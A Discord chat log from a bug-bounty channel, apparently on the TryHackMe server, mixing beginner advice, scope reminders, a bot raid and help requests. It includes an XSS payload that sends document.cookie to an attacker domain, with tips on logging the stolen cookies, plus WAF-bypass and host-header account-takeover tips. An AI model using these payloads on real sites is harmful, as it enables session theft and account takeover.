#bug-bounty

Can anyone guide me

how can i start bug bounty?

look into the pinned posts in this channel

okay

Hi chat I found this endpoint called Jenkins file and here is the content ...
Is this consider a sensitive info / how to exploit it

fk

what rooms can i do to prepare myself for bug bounties?

web rooms?

oh nvm its pinned

How much time do you spend on enumeration/scanning before moving on to testing? Do you wait until you find something juicy or do you scan for a set amount of time and then look over the results?

Enumeration should be constant, unless the scope is massive you don’t tend to have to scan

But everyone is different, and over time you get a gauge on how long you like to spend on that part

Hello ..... I need some instraction .. I searched on youtube and watched a lot videos on the topic but didn't understand how to solve the task........https://tryhackme.com/room/owasptop10 ............................. Task 16 Q: Where is falcon's SSH key located?... I copied the answer so that i can complete the task..... But What happed here ... How can i found Where is falcon's SSH key located? using xxe .... i used command "locate .ssh" insted of using file name but nothing happed I am a newbie.............Pls help me what payload i need to find out the .ssh file .... I am a n00b

#room-hints or #room-help to ask for help with specific rooms. This channel is for bug bounty programs

okh

Hey guys, I need some help with an XSS
So the website am trying currently is encoding > ' "
Its using .NET and the payload am using is BATMAN">＜img src=x onerror=alert(document.domain) />

However, in some places, < = : are allowed

Any Request Validation bypass ?

algum br?

Please keep all conversation in English in this discord

yes

Practise web app https://twitter.com/rafinrahmanchy/status/1179366469093777412?s=19

this is what u mentioned in general drago>>/

Yeah,I meant u were asking for web app practice platform

ah..! noted | thanks for the resource

https://tenor.com/view/martin-wallstrom-martin-wallström-tyrell-tyrell-wellick-gif-20192229

I submitted no rate limit bug in password reset page. It leads to send as many mails an attacker wants to the victim, leads to email bombing or dos. I saw many reports which are considered and rewarded bounty. My report is marked N/A

Why it happens like these

The reports are 100% similar

Bug bounty goes off of impact

It isn't a pentest so stuff like that wouldn't be deemed as a valid bug. A lot of scopes will define that

Every program is unique and so is their scope so make sure you are familiar with it otherwise it leads to those N/A vulns

Can I get some assistance with a Hackerone report? Don't worry, it's not a private program.

Read the program Out Of Scope , you would get it .

can anyone help me ? By saying that some resources to learn xss advanced

topic

Check portswigger academy xss lab ,total 30 and there research material is also good.

Aye!

How can I start in bug bounty? I mean do I need some certs to start my journey in bug bounty?

Check pinned messages. They will help you out

thanks

Gave +1 Rep to @rough creek

I mean do I need some certs to start my journey in bug bounty? No. Certs are for HR when applying for actual jobs.
The knowledge gained might help you but having a cert doesn't exactly have value for bug bounty.

wapt v3 or web hacker handbook?

can i dm you?

ping me in #general instead

god not the spam again please

lol mass ping

@narrow onyxd

bruh

i will cry

oops

yikes

lol

oh my

amm ?

LOL

Lmaoooo

wow you're such a hacker

wtf

again?

NOW HERE???

ummm...

ARE TIU SERIOUS

Wtf

what

wat

@lone ginkgo @uneven cedar are the bots

why have I been summoned

why spam i this server lmao makes no sense

that's a fast response from the mods 😄

STOP

Bruh

ammm

oh a lot more

@worldly hull

bruh

okey dude

i cri erri tiem

I can’t believe thus

🤡

lol

@drifting laurel @near ibex are spam bots too ban them

-ban 846572623696756736

Unable to run the command: A reason has been set to be required for this command by the server admins, see help for more info.

another one of these :/

I feel sorry for some people the dedicate time to do this

SeVeRaL PeOpLe ArE tYpInG

@near ibex what are you doing my guy

ping time

ooo its john hammond

I’m sleeping. Annoying ass raids

BAN

pls

@hot nexus @smoky ermine are bots

Geez

kindly fuck off ty

Disable mentions for a bit

bro

https://c.tenor.com/_aCMFjsf6_gAAAAM/how-could-this-happen-to-me-i-made-my-mistakes.gif

ugh what a fun time

Who is tagging me?

I’m on mobile

@mortal cliff is bot

yeah who

bot raids :/

bots are spamming

they keep leaving

someone tagging me

more haid, i guess

cant disable mentioning specific users

Haha GOT NOWHERE TO RUNNNN THE NIGHT GOESS ONNNNN

Im trying to say who all the bots are that i see

JohnHammond posting.... at the same time we get raided. Coincidence? 🤔

come at me bro

WE CAN ONLY FIGHT BACK WIRH MEME GIFS

oh hey its john hammond nice

Let’s go John we got this!!!

Goodnight bois/girls

@young leaf you have right click ban perms back

https://tenor.com/view/cat-computer-typing-fast-gif-5368357

Kill

Erm

Hello

Perfect

Thank you

Muiri

Get em

see what invite the bots used and ban the user who created it if its not a public one?

Doesn't work that way

Wish it was that simple ^^

Oh my, in the presence of hacking royalty here... 🤣

We have a vanity URL...

(public meaning used to advertise the server)

ah

they could have still used a custom invite link though

who pinged me ?

bots

Bots

oh

is there a snipe command?

,snipe

.snipe

No

who pinged

spencer

its autodelete

• undelete

@fallow vapor bots.

aah

Apologies

party 🥳

party indeed... ping

Add a bot that can snipe messages

or you can add this code to the thm bot

https://stackoverflow.com/questions/63225137/discord-js-making-a-message-sniper-command

The bot is written in JS?

nope, discord.py

yag already has

make a PR 🙂 https://github.com/thm-community/thm-discord-bot

So then that SO link is utterly useless lol

oh its open source

i might take a look at that and contribute

i did no response

waiting for pr to be talked about

What's this bot's prefix?

which bot? TryHackMe or yag?

THM

check out #bot-commands

or w/e one has the snipe command

it kinds differs

ah ok

i would assume ! based on the status

yag has undelete

and its -

but its only for mods

What PR?

And yeah, I'm adding in some raid protections ASAP

if a user pings more than x people in a message delete it and mute the user, along with logging their name?

https://github.com/thm-community/thm-discord-bot/pull/199

wait am minute

Yag already does that. It outright bans them

ah

i messed it up

one second

it doesnt wanna register my commit huhh

@left patio ah, that one. Pretty sure the bot doesn't have manage channel perms. Do us a favour and add archiving / deletion stuff as well? Then can look at adding the perm for it

yeah :D

also it seems my commit went poof

wut

(explain what you mean more btw thanks)

No point in just adding an endless stream of channels -- adding the channel takes no time at all, it's archiving it that's a pain

Lemme know if you want help

ahh i see

#release-help-archives

yeah yeah

would have to up an api for the archive thing first, its the discord archiver right?

I always back up the channel before deleting -- if that can be automated it saves a lot of time

yeah

Aye. You also have to make sure there are no false room releases though (i.e. check that the channel doesn't already exist)

which archiver you using?

The bot often announces things erroneously, which wouldn't end well with that commit as it stands

hmm.

The c# one. There is a Python port though

https://github.com/Tyrrrz/DiscordChatExporter

?

Not a clue. There's a link in the channel I just gave you access to

so many channels, which one 👀

oh nvm

Right, I am going back to sleep. I need to be up early

so many categories so many channels :P

sleep well muiri. 😴

o im greenish now

gn muir :D

🏓

Who dare summon thy?!

god

bots

Where's my fellow Bug Bounty Hunters?

What's this?

Well it was supposed to be a gif

But it manifested in discord as a link

I'll delete it

@languid oyster a few things:
A) believe it or not, that is actually against the rules. You haven't read the ToS apparently, so, well done there... targeting users is frowned upon
B) blocking ssh from the firewall would thoroughly break stuff like reverse SSH forwards, wouldn't it?
C) we tell people connecting that there is a risk, and to not be idiots with their security. Anything beyond that is up to them, and us site banning any idiots we catch in the logs trying to attack people
D) that isn't a 0day -- it's common sense networking.

There is nothing we can do to stop that without breaking stuff.

Hi

I found clickjacking in Tryhackme website

Ig that is OOS

What is OOS

out of scope

ok

🙂

ok

thank you

in Tryhackme only or all web

in THM

ok

thank you

Please make sure you understand our scope because violating it will get you in trouble!

ok

Any place where beginners can earn bug bounty? Cause bugcrowd has some limitations sometimes. Like you should have reported twice before this and all...

for a bug bounty hunter what language would be more favorable, python or bash ?

For automation python,bash (tho i have seen people using ruby also for exploit writing),js to understand web app working,xss

Python and Bash sounds easier. Ruby will have to wait

Those 2 will work just fine,ruby u can learn later (if u want to)

That's what I'm going to do

Hi guys I want to ask about bug bounty, I often encounter problems if there is a website that is vulnerable to sqli when doing fuzzing to determine whether the website is really vulnerable it doesn't trigger the waf at all and when I do further exploits using sqlmap it is detected by sqlmap. My question is how to determine the suitable tamper to bypass the waf? take for example immunify360

can anyone help me

If u see its protected by services like cloudflare then sqlmap will be blocked sure the only way is to test manually often encoding payload if its blocked or see waf bypasses for a particular service

Meaning I have to manually test before using sqlmap? like testing what keywords are blocked by the waf then when you get it, all you have to do is look for the tamper that matches it?

Sometimes I also look for references for certain waf bypass but there are some waf services that have no reference

See wappalyzer if it isnt protected by cloudflare,akamai or other well know service ,try sqlmap on parameters (go for subdomains they aren't heavily protected) else test manually what payloads r blocked and what not

Ok thanks for answer i got it

Gave +1 Rep to @past hatch

Bug bounty isn’t beginner friendly, just pick another program if the one you’re looking at is limited. Hackerone has a lot of public programs too

Cool! Thanks

Gave +1 Rep to @native token

You can get pretty far with just bash and in some rare cases python. You don’t really need any scripting for bounty unless you’re pulling out 0days

Scripting is useful for making PoC's. Most programs/companies will want one. I usually do them in python

Tell me OWASP testing guide 4.2 is good for bug bounty ?

I mean good for learning?

@past hatch

Kindly answer to this

@chrome venture Yes OWASP is good for bug bounty

If you're referring to OWASP WSTG then be careful as that is oriented around web pentesting

so many of the vulns it may say are vulns. Won't be accepted by a bounty program

e.g best practice for headers/cookies

Interesting! I will give bash a try instead! Thank you

I got scammed

Found an html parameter pollution issue that allowed me to hijack sessions and execute arbitrary code. I submit it to the company, and they wouldn’t pay me and patched the issue anyways :(

Waiting to hear back from Hackerone

Was it a VDP if so then they dont pay,and if its a BBP whose pays r already mentioned in policy then email hackerone related the issue

It was a BBP and I already emailed hackerone

I’m just whining

Thanks anyways!

Gave +1 Rep to @past hatch

Yo you also bug bound ?

don't actively but i do just for fun and learning

Awesome sauce. Didn't know you did.

Anyone know a good automation tool for IDORs?(SOLVED, I found a video)

https://youtu.be/HQUxXE1oaIE

Authz,autorepeater,authmatrix,autorize all available in burp app store, also firefox container is best to test without destroying session of user😄

Burp suite is king as always:
Credit STOK
https://www.youtube.com/watch?v=3K1-a7dnA60

Thank you for this!

Gave +1 Rep to @native token

Forgot to say thank you @dusky yew ,for your help with my keyboard config file

Gave +1 Rep to @dusky yew

My god! the best video ever suggested !!! this is great!

Guys I got a reflected xss using the payload as "onmouseover=alert(0)" as < and some other tags are blocked.
Can anyone help me to create a payload which steals cookies just like the payloads we have on XSS hunter? Or can share any material from where i can learn this?

Check last labs of portswigger academy (xss labs) it covers lab to exploit xss further more

Thanks, I think this will work "onmouseover="location='your_domain'+document.cookie" z=

Gave +1 Rep to @past hatch

Yes it will work then u can capture cookies in ur server log by seeing that GET request

Yup, I just need a public ip server. i was hoping I could test it with THM Openvpn but my payment got stuck lol

Haha why dont u try portswigger's lab exploit server,some labs got exploit server and they also have log option

Oh I didn't knew this.

@gray trail else with axiom first get public ip then start server on ur machine with python ,now u can trace any request

Thanks, I will take a look. I am just knew to all this.

Gave +1 Rep to @past hatch

@gray trail https://youtu.be/z2XmaQxTJ0M

Can ngrok solve your issue?

I was following this https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md

I have this as well. Sometime I do THM and sometimes PentesterLab

@gray trail take look on it ,stok run a server and get a public ip with axiom

Ok 🙂

Failing that use hookbin https://hookbin.com/

it will generate you a url and log any extension given so ?c+document.cookie would return the cookies as you specify

ngrok would also work by hosting a httpserver using python and then doing ngrok http <port number>

failing that ngrok tcp <port>

Thanks I will keep this in my notes for next time. Although used the Digital Ocean droplets and the script mentioned in https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md

Gave +1 Rep to @native token

And it worked fine 🙂

todayisnew reached 100K rep on H1 and they are holding a CTF which was made by adamtlangley (One of the staff here at THM)
Winners will receive a $100 - Ends on June 7
https://hackerone.com/h1-ctf?type=team

that guy is a hacking machine

Good Evening Guys. I'm A Beginner In Cybersecurity, And I'm Looking For A Start Into Bug Bounties. I'll Be Glad To Get Any Pointer To Where I Might Start 🙏 Thank You In Advance

Check the pinned messages. They give you a lof of information. Happy hacking

Best pointer anyone can give is don’t go into bug bounties yet.. as a beginner you’ll make nothing, get demotivated and potentially breach policy.
Try starting out in tryhackme and portswigger, gain an understanding of common web vulns in owasp top 10 and develop your understanding from there

@native token Thank You Mate, Much Appreciated 🙏

Gave +1 Rep to @native token

Guys I want to start bug bounty can anybody share some tips and a roadmaps

@toxic robin ^

Thanks @past hatch

Gave +1 Rep to @past hatch

anyone wanna colabo on a website?

who can i dm about a bug bounty im doing

i have a question about something ive done

is it regarding the reason why sites were down -?

nah

Dropped the table? jk

which one?

Sure

@lavish hollow ^

-ban 714906521355419679 Steam scamming links

🔨 Banned 714906521355419679 indefinitely

damn it Jabba ur too quick

rabbits are phast

So I've been solving machines on TryHackMe and have solved a few machines on HackTheBox. I want to kind of get started into WebAppSec or whatever BugBounty stuff. Also I know Python and basics of some other languages. What would u suggest ?

start with portswigger academy

Ohkay

Also do u suggest learning some JS and PHP from codeacademy ?

Or any other resource u would suggest for that ?

js,sql from sololearn

Ohkay

U mean SQL ig

Thanks :)

np 🙂

who wants to collaborate with me for search vulnerabilities?

I got bounted 1 time by riot:

Happy Sunday all!
Where might I ask a question about the TryHackMe Reddit?

Depends, what is the question? @odd laurel

Just wondering the criteria for the 'Approved Streamer' badge there..

You have to be an active streamer generally, not sure of the follower count but @merry plume or @prisma axle should be able to help you further in #general

OK. 1k+ followers. THM almost daily since January. Under the THM game category since it came out. (I was live when that happened and changed it on the spot 🙂 )

I'm guessing your ping will get their attention. Thank you @lavish hollow

Gave +1 Rep to @lavish hollow

If you send us a mod message on there we can help you further and give you the flair

Awesome! Thank you @prisma axle!

Gave +1 Rep to @prisma axle

Awesome! Thank you @wispy notch

Nothing???

LOL

It was just a testing....

xdddd

Hi

Anyone have some experience reporting issue to MSRC?

I don’t know what they are smoking when reproducing the issues.

anyone ever done any bug bounty on synack?

hey

<div>{myinput}</div>

how can i bypass html entities

for trigger xss

I'm not

interesting

Hello @past hatch I added $.get('http://sakurity.com/jqueryxss') in console and domain popped up

Putting stuff into the console isn't a vulnerability

The website is using jQuery version 2.1.4 how to exploit it further or can I report it like this

How to exploit it

It would only be a vulnerability if you can get the XSS to fire when you submit data to the website in the form of inputs

I have no clue off the top of my head.

You'd have to look at which parts of jQuery are susceptible to XSS and check to see whether or not the website is using those vulnerable parts in order to create your payload

I found that the website is using jQuery version 2.1.4 and I got the following vulnerabilities for that version

+1

Before my report getting closed as Out of scope I need to show them impact

Any suggestions??

You don't have a vulnerability mate

putting something in console isn't a problem

Holy moly I got XSS on google

@molten raven its an example of xss

u put input in field

Oh..ok

tho its also self xss bz i had to provide input in input field ,but i can combine it with csrf

Then I have a doubt, how was that version vulnerable then?

jQuery

This one??

jQuery is a javascript library

that will have certain components vulnerable to XSS

The only way it is vulnerable in your instance is if the page is passing user submitted/controlled data through one of these components

In the case of bug bounty, this isn't deemed a vulnerability unless you can show a working XSS proof of concept

in a penetration test it's a low without poc and up to a high if exploitable

Ok thanks for the explanation

self xss:- xss pop when u enter code in cosole,xss pop after giving input in field,requiring user interaction (not through url parameter)

Thanks a lot @native token and @past hatch for clarifying everything

Gave +1 Rep to @native token

THM community has decided to grant you the Bug Hunter badge... Congratulations 🥳🎉

?

For this bug

I am sorry @past hatch for continuously tagging you. One last thing, the jQuery version is vulnerable to prototype pollution attack thorough $.extend

I read somewhere that it can be exploited to RCE but I didn't found any method. If you have an idea on this could you help me how to make more impact so that report gets considered

XD omg

What?

@past hatch Hey need little help there is smtp server i can use HELO and MAIL FROM command have not done username enumeration yet. what should i do now to improve the impact..

First question you need to ask is, are services outside of the web apps in scope

no it si not

don't waste your time then

HELO is a standard function of almost all SMTP servers

i should skip it and username enumeration should i do that or leave it

leave it..

it isn't in scope

great

and you will be in breach of their policy if you test it

Oh Damn

bug bounty isn't scan and test every port

it is about impact

that is why i came here

but it isn't in scope

the main thing with bug bounty

READ THE DAMN SCOPE

Well procced according to program policy

Ok Master

Hello

How I can Do bug bounty by Mobile phones

doing it on phone is pain,but if u still want then try PentestSuite https://twitter.com/guhao95518074/status/1399546625752809473 https://pentestsuite.blogspot.com/2021/06/attack-dvwa-weak-session-ids.html

Okk

Thanks you

Other resources for bug bounty by mobile

Hey, I'm thinking about moving my web hacking box to the cloud. Is that even a good idea? What service should I use?

I've been trying with AWS but the service has been difficult to use and there is a whole mess of proprietary OS garbage to get through. At least that's what it felt like to me. I'm not an AWS ninja like some.

Consider ephemeral boxes you spin up as you need them. AWS, Azure and Digital Ocean all charge using time based billing, so you can control what and when compute runs. And all support CLI based deployments, so you can easily script it.

hi

for THM, is there any machine i can learn about laravel vuln?

I've searched for it too, apparently it's not there

hi

i need help

i want to start hacking but i dont know how or where to start.

can someone teach me

#start-here

Question: does the Web Fundamentals room help prepare well for bug bounty hunting on a regular basis?

yes

Hi, I would recommend you to go for the THM Beginner's Path.
it will help you a lot

well, it gives you an intro to common vulnerabilities and ways to exploit them, how to use common tools. in fact it gives you what web app Hacking looks like,which can get you into Bug Bounties

Afterwards portswigger academy to exercise what you learn

This will help u very much in bug bounty
https://www.stokfredrik.com/bugbountytraining

Hey sry to interrupt you all but can anyone tell me here that which bugs can I find on Android as I don't have lappy so??

thanks man this is very helpful

Gave +1 Rep to @dense cloak

You can do a Android bug hunting courses from YouTube, or something, There a free udemy course on Android bug hunting by Uncle Rat, u can check it out!
https://www.udemy.com/share/104kpEBUAScltbRXo=/

Thanks buddy for your help!

Gave +1 Rep to @dense cloak

can we directly start finding bug in public bug bounty program without permission

aor we have to take any permissions

if the program is in Hackerone or Bugcrowd and if it's public then you can create your submission and submit it

for finding a bug can we have to take permission

on bugcrowd or hackerone

As it's public there will be no written permission. But you should follow the Program Rules and Policy before hunting. After finding a bug, make a clean report and submit it

Okkkk Thanks @molten raven

Gave +1 Rep to @molten raven

🙂

I confirmed that a website is using Lodash version 4.17.19 which is vulnerable to Command injection via template. Here is the synk report https://snyk.io/vuln/SNYK-JS-LODASH-1040724 . How can we show impact to website so that our report get's considered

@native token @young leaf could you please help

How can we exploit it further, it's a domain.

You've pinged a good 6 other people man

Yes. But I didn't get required method. So trying to reach out others

@small mango Hey can you provide context before dropping random IPs in chat :)

its just XXS challenge

Who’s challenge? Is it a public CTF? Is it on-going (active)?

Just be patient, we're all volunteers here 🙂

Hey
Anyone who knows how to decode playload

?

playload???

😋

I got the solution

that's great, Keep it up

Any one who can help in pentesting

If you're wanting help with a pentest then I'd suggest you talk to a colleague under the same NDA as you

If you're in this yourself and do not have a colleague under the same NDA as you, I would suggest working for someone else until you're comfortable enough with pentesting to not need to ask the internet for help

@hybrid orchid is right

... thank you for that ping and affirmation

Mine pleasure

How's your day @hybrid orchid

😬

eyo is it possible to find xss as an absolute beginner in the spam of 1 month?

Depends on your dedication I guess, but also which programs you are on.

searching on h1 programs

or bugcrow

d

Honestly as a beginner I'd advise you avoid bug bounty

Just learn what you can about web app testing until you feel like you understand the common bugs you may encounter. Pinned posts have a good guideline to follow and then once you feel you are extremely well versed try find a program

is there a way to automate xss bug bounties? I've been experimenting with tools like XSpear but they are not finding anything

Everybody and there dog looks for XSS, why not try something else? If you can automate it somebody already is, meaning they'll get it before you.

Well yeah but it's the most common bug

It's fine if you want to hunt XSS, but it's going to get frustrating quickly as like I said everybody is looking for this. You'll find less and make less.
You're better off learning either more obscure or other attack vectors and searching for those.
@past hatch wanna confirm?

@unborn drift as magna already mentioned xss is way more common bug,,if u found one chances of getting duplicate are very high,,i will suggest to look for business logic vuln,open redirect,csrf,sqli,ssrf,accoun take overs,broken access control

Always wanted to find a SSRF

Ssrf are always tricky,very few chances u will find url parameter in request,one way to widen attack surface is to use waybackurl,gau (to extract more url for that domain)

Hi every one!
I new to bug bounty, which bug-bounty websites would u recommend...??

Bugcrowd

hackerone

I think u replied to wrong msg

🤦
So Sorry

I have a question

I use hackerone but both are good and open programs

@fallow sable @tiny rivet
considered🙏🙏

Thanks for these resource I have been looking for stuff like this. Super stoked to dive in, awesome

Gave +1 Rep to @dense cloak

Hello

i wanted to ask you guys something

What do I need to find bugs and be a bug hunter

?

!docs bug-bounty

if you're interested @fallen palm

oh thanjs

(that's specifically THM's bug bounty program)

thanks*

What's the meaning of THM?

oh

ok

TryHackMe, the discord you're in. It's a site for learning cybersec.

i know it

yep thanks

@vocal folio sorry, Just wanted to ask you

if i learned CEH V10 will i be able to find bugs?

CEH is not a good cert.

CEH ir more theorical concepts in cybersec @fallen palm

Recommends to you to start with ejpt to improve offsec skills

@round hearth its not a prop for me if it will make me able to find bugs

CEH is only valuable in India.

will it

?

Bug Bounty is also not reliable income.

Cert doing and bug finding are two different things

cert means certification?

Yes

i dont want to be an income for me but i just wanna learn it

thank you guys

i really appreciate it

How long does it usually take to complete a bounty?

Like, 1 month average for someone with semi-advance skill set?

It depends on person and his skill,some may take a 5 months,other a year,,Speaking of me i took 3 months to get my first paid bug,,Bug bounty is about methodology,,identify what u r good at and keep improving.

Ah, makes sense why it wouldnt be a good main income source.

What was your first bug?

It's not reliable at all

In countries with low cost of living where a bounty will pay for a couple months rent or whatever, it's a little more feasible. But remember you're competing with those people too.

I wont say to do for money,,do for learning instead.

Im in the US -- the $50 reddit bounty def aint livable for me lol

open redirect and xss

I struggle with xss -- understanding it better everyday but never saw any results so far

Well xss is common bug and truth to be told if u found one chances of getting duplicate is more.

Do those portswigger xss labs ,30 total labs and good reading material.

I manage to get a server to show part of it's sql code by accident once lol.

Mistyped my password on the login screen as dumb as it sounds

What did you learn to do it?

I started with THM's web fundamental path (cleared the basics) then moved to Portswigger,finished more than 50% labs topic wise,,then reading bug reports to work on methodology and applied what i learned to targets.

nice

thanks for the help

I'm a blue teamer that has little to no understanding of this type of thing, but I figured someone out here could possibly help me out.

I've found a website that emails passwords in plain text after an account is created, and was curious if that's the type of thing you could typically find/claim a bounty for? And how would someone go about doing such a thing?

Maybe if you have a way of intercepting and obtaining the password

Well it depends on how website handle request,,when it comes to account takeover i check for certain things,is there rate limiting on login form,if no easy bruteforce,,no csrf placed on email change,header injection on while requesting forget password,, parameters in submitting password change request.

Definitely something you'd raise in a pentest. Wouldn't mean much in bb unless you could intercept them.
Emailing the passwords in plaintext indicates that they're likely also stored in plaintext (only way this isn't the case is if the email is sent before the plaintext password leaves the context of the signup form, which would be poor practice), which is really serious -- just not something you'd really claim a bug bounty for.

How does that have any relevance to passwords being sent in plaintext..?

Relying solely on bug bounty isn’t a smart move.. but on the side is a great move

Analyse the request that sent password to email,,try Header injections,see if u can make request go on ur controlled domain.

Now you're just spouting buzz words

Are you meaning try to redirect the email to your own address? For which you'd also need a CSRF.

Nope,not redirecting email,, say if u receive email mentioning link https://domain.com/account?email=value&password=value ,, via header injection(if vuln.) the email receive will have https://controlled.com/account?email=value&password=value ,,, leading to send a Get request to controlled.com with parameters value.

That's... not what they're talking about

They're saying that when they sign up for an account on the website they get an email containing the password. Not a link to the site with the password in a get request

Not necessarily stored In plain text they could store the plain text in a variable or session and fire off the email with it before storing the hash In the db.

Best way to check would be to request a new password, if it just sends a plain text pw then you have your answer.

Still a terrible idea mind

Hence the "likely". It wouldn't be great developmental practice to fire off the email from within the context of the sign-up though, no?
As in, should that not be compartmentalised so that the email is getting sent after the signup is completed?
Definitely agree with the requesting a new password though 🤷‍♂️

Then again, sending plaintext passwords ain't great developmental practice either 😆

Yeah that’s what I meant, sign up complete send email off then store hash in db.

No absolutely not a good practice at all and IMO should never be done, it’s like writing your password on a sticky note and leaving it on your monitor but digitally (email box)

You can eliminate that as a possibility by trying a password reset. If you get it back in plaintext, then they're storing it.

Yeah the second half of that message more or less says that 😅

Thanks! This is what I was looking for. I'd probably just email them and tell them, but wanted to check in case there was some $$$ to be made somewhere... 😛

Gave +1 Rep to @hybrid orchid

Hey guys. Is there anyone who does “live” bug hunting? I received a few invites for private bug bounties but have no idea how to begin. I mean, I’ve been practicing a lot on THM, but never put my hands on the real thing. I would love to be able to watch and learn someone going through a bug hunting session.

You’re unlikely to find anyone do live bug hunting due to the legalities of responsible disclosure. The closest you’d get is Nahamsecs streams in which he does live recon on targets

Other helpful things could be insider phds YouTube channel as she demonstrates a lot of owasp top 10 vulns and maybe if you want a platform to practice zseano has created bugbountyhunter which is a realistic environment to hack

Thank you for your reply.

Gave +1 Rep to @native token

Can someone suggest the best way ( if something of such kind exist ) to start my training and career on 🐞 bounty!
I am planning on specialising in this area.... Help me out guys!

It's not a great area to specialise in. Mostly depends on location but check pinned posts. I've already made a pretty big post on this

Why do you say isn't it a great area to specialize in ?

All bug bounty is, is a giant game of hide and seek in which you are basically hunting for anything a pentester may have missed. It's also not a guaranteed income so isn't exactly ideal.

You also have the fact that if you live in a country such as the USA or UK you'd be constantly stressed as a $200 bug isn't going to pay for food let alone rent and other bills.
It only really becomes viable in countries in which the living cost makes it feasible. And even then, you'll be competing against those who also do this professionally over in said counties

I'd rather earn £20-£35 per hour pentesting instead of doing bug bounty. A lot less stress

Ahh makes sense

What significance does bug bounty play to become a pentester? Will certificates do good or you're expected to find some real vulns also ?

I mean it's a talking point and shows you're capable of identifying vulnerabilities on production sites.

I imagine if you're good at bug bounty you'd be able to pay for the entry certs that they look for

mainly OSCP in most countries

Right

Also, by this do you say that most of the bug bounty programs already would've hired a couple of pentesters before launching their bug bounty program ?

If yes, why ? I mean, a bug bounty program alone shall do enough good right ?

bug bounty hunters rarely test for all types of vulnerabilities and so will miss a lot more than two pentesters would

Plus the type of things reported is different. On pentests we would test for OWASP top 10 and then also look for best practice such as SSL certificates, TLS/SSL configuration and say cookie best practice

Ohh, that's nice

Thank you, had a nice chat 🙂

what post?

Owasp ZAP and i found some "unsafe CSP script-src" how can CSP scripts be unsafe? 🤔

https://drive.google.com/file/d/1D0onF_DucFKbphDljOisx_G0aYooK9O2/view?usp=drivesdk

Why do I have not permission to send images? Whatever i send a link to the picture

People kept spamming obscene images

Verify with the bot and you'll get the permission to do it

!docs verify

Oki!

Check pinned messages.

ty

Gave +1 Rep to @native token

!docs verify

does anyone know what the path is where amass keeps the config. ini file in kali linux? trying to add my api keys but i can't seem to find my config. ini file.

U may find solution here!
https://github.com/OWASP/Amass/issues/381

Has anyone ever messed with docker? I'm following this tutorial https://www.youtube.com/watch?v=QinRdVCDg-k&t=577s . Running into an error where it says the kali-rolling container (image?) does not have a Release file. It will tell me docker is not installed when I try to uninstall docker, then when I check docker -v (version), says docker build. When I run hello-world in docker after that it prints hello world and acts like docker is installed. I am working on Orcal virtual box with Kali, trying to set up docker inside kali on the vm.

where is a good place to find bug bounty??

or at least a good place to start working on them

You mean find programs to test for bugs?

In that case hackerone, bugcrowd, intigriti and there are more

https://disclose.io/programs/

U will find this helpful!
https://www.stokfredrik.com/bugbountytraining

has anyone here done a lot of CTF? Doing my first CTF now

@trail comet Can you post the actual link, not a redirect link please

Hi
Guys
Zomato giving 3 Lakh to bug so are you ready to do

hey guys, what do you think about hacker101 ctf for someone wanting to start doing bug bounties?

Best of both worlds, it trains you in the types of vulns you'll be finding while also getting you private invites to programs that aren't as populated

I think for now atleast in the beginning, I should focus on getting into private programs. I used to do a few of the hacker101 challenges and thought I could go into public programs but couldn't find anything. Thanks for your input. I'll focus now on that and get into the private programs and get familiar before going public

Gave +1 Rep to @native token

Is there a beginner team of hunters who are looking for new blood?

What's the incentive for taking part in a vuln disclosure program? Just recognition?

A warm fuzzy feeling inside

H1’s learn ctf is a good way to get motivated to see what real world bug hunting looks like at a low level. Good communication skills can do that too after you know what to look for.

It’s a long journey, so learn your best way and take your time with it.

Anyone experienced with Prototype Pollution? In that case, check this website https://snyk.io/vuln/SNYK-JS-LODASH-590103 (CVSS 9.8) and dm me if you have any idea on how to make a PoC for either RCE or Property Injection within this vulnerability

Yes but pirtswigger has also very good labs ti practice (they are almost identical to real world vulns.)

how would you describe beginning? I imagine private programs invite top bug bounty hunters so theyd invite the opposite? New to this, curious. Bug Bounty hunter in the making

Private programs would involve smaller number of people so yes, could give you a better chance. I do also feel that since it is private, it would also include highly skilled but hunters. That also doesn't mean that they won't be participating in public programs. For me, it just boils down to the fact that private programs have fewer participants so you're more likely to get successful.

I believe I've found a vulnerability where the host header's being relied on and used to help build the URL (I hope I've phrased that right), and there's session info disclosed in the URL which would be carried across to an adversary if exploited but I'm wondering to myself how an adversary would be able to influence the host header... any ideas?

I have done a little with docker. You still having issues?

How do you pick between ZAP and Burp ?

Why not both?

Good call!

I found a critical issue through IDOR on a website, the problem is that the userId is identified through connect.sid cookie. And it's encrypted, anyone have any idea on what I can do to create my own or decrypt this cookie and after decryption encrypt it with another persons userId. Example: s%3AUa62Yyrqv7C0gQg0Cl8BH0TjvFZMv9eO.FYwNFOaaDw5Z92hhkbri5ajw7s5hURaumGkpc5BxLEA

Ummm you’ve just explained how a lot of websites work. Unless you can gain the original key that is used to create the cookie. It ain’t a critical

It’s quite common that you see it via jwt tokens that will specify a user Id, because it’s not really possible to forge then

@native token Is there anything I'm able to do? Since it's a crypto website and I'm able to sent requests that can for example send over all their crypto to another account, the only problem is that I have no way to specify which user to "take" the crypto from, I can only do it from myself using my alts connect.sid

It’s a session cookie, that’s literally how websites work

awesome

guys is there a list of bugs that is hard to automatically search for (like business logic)

I am working on a target which is behind cloudlfare, when on burp, captacha pop up after every request or two, how can I avoid/disable these captchas and do hunting without getting distracted?

I'm testing a site for bypass upload restrictions, I have two payloads with the same name, One is being blocked by cloudflare and one passes but I can't seem to get it to send a request to my site

Any ideas?

see if this helps?
#resources message

hello guys

i am trying to download immunity debugger on my windows machine

but it downloaded only the HTML page

I would suggest trying to ask in the #infosec-general channel as this channel is for bug bounty

thank you

okay

Thanks

Gave +1 Rep to @ebon tapir

Dm me i will take look

Rce,ssrf i would say business logic aint tough tbh,but depends on person,finding business logic require a very good knowledge of application workflow

Burp pro,u wont need zap,,but if u r using burp community then for intruder attacks only use zap,else burp cm

Well if u found that host header is used via generating a url,9/10 its vul. to what telling here to test for,don't go for any session info leakage,,,go to password reset functionality,give it ur email,,intecept the request,change host value to evil.org(for poc) and send request,,in ur email inbox,if u password reset link as evil.org/account/token_value(basically ur injected header),its full account takeover.create poc and send it to program

im asking like for types of bugs that are good for beginners to start and test for (not like xss that the whole industry is searching for)

it totally depends on what type of web app u r on,but go for rate limiting,race condition,hunt for that bug u think u r good at

@limpid oak here is a checklist if u need https://github.com/harshinsecurity/web-pentesting-checklist

thank you very much

